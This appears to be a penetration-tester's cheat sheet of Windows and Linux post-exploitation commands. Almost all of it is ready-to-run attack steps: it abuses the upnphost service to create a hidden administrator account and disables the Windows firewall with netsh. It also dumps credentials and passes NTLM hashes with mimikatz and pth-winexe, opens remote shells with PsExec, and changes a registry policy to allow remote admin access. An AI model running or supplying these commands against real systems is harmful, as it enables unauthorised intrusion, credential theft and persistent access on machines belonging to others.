file transfer;

Winpriv check:

Local Privilege Escalation Abusing Misconfiguration Service (upnphost):

accesschk.exe -uwcqv "Authenticated Users" /accepteula accesschk-xp.exe -uwcqv "Authenticated Users" /accepteula

accesschk.exe -ucqv upnphost sc config upnphost depend= "" sc config upnphost binpath= "net user testxlab Password1 /add" sc config upnphost binpath= "net localgroup Administrators testxlab /add"

sc stop upnphost sc start upnphost

File Transfer via FTP

ftp > binary

ftp> put /root/Downloads/accesschk.exe accesschk.exe


Python Interactive Shell

pty spawn python3 -c 'import pty;pty.spawn("/bin/bash")'

python -c 'import pty;pty.spawn("/bin/bash")'

Disable Windows firewall on newer versions: NetSh Advfirewall set allprofiles state off

Disable windows firewall on older windows: netsh firewall set opmode disable


priv esc linux - hacking articler (abuse path variable.)

priv esc - cronjob

priv esc - windows - servisler - sc


pth-winexe -U alice%aad3b435b51404eeaad3b435b51404ee:B74242F37E47371AFF835A6EBCAC4FFE // cmd.exe

via sysinternals tools and mimikatz

  • PtH get user ntlm hash. (via RDP, MSF or other)

mimikatz# privilege::debug 
mimikatz# privilege::minidump FILE.DMP 
mimikatz# sekurlsa::logonpasswords 
mimikatz# sekurlsa::pth /user:{USERNAME} /domain:{WORKGROUP or DOMAIN} /ntlm:{NTLM-HASH}

then open new cmd. you can run command via psexec.

windows> PsExec.exe \\{IP} cmd

Tip: General usage with password:

PsExec.exe \\{IP} -u {DOMAIN\USERNAME} -p {PASSWORD} cmd

if got "Couldn't access otherComputer: Access is denied." ERROR:

run the following command at target system:

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

Last updated